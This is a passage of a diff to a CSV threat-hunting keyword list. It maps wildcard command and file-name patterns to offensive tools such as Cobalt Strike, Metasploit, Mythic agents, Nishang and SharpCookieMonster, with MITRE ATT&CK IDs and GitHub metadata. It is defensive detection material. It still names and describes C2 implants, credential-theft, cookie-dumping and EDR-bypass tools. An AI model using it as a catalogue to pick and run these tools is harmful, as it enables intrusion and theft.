professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ExecCmdImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Exec-Command-Silent.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*execmethod*PowerPick*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execmethod*PowerShell*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*Executable_Files-main.zip*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*execute_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*execute_assembly SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*execute_bof *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*execute_pe -PE*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*execute_Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*execute_shellcode *","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Execute-ACLight.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Execute-ACLight2.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*execute-assembly *.exe *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*execute-assembly *asreproast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly *kerberoast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly SharpBlock*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*execute-assembly*Seatbelt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*execute-assembly*sharpcookiemonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" -"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*ExecuteAssembly.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 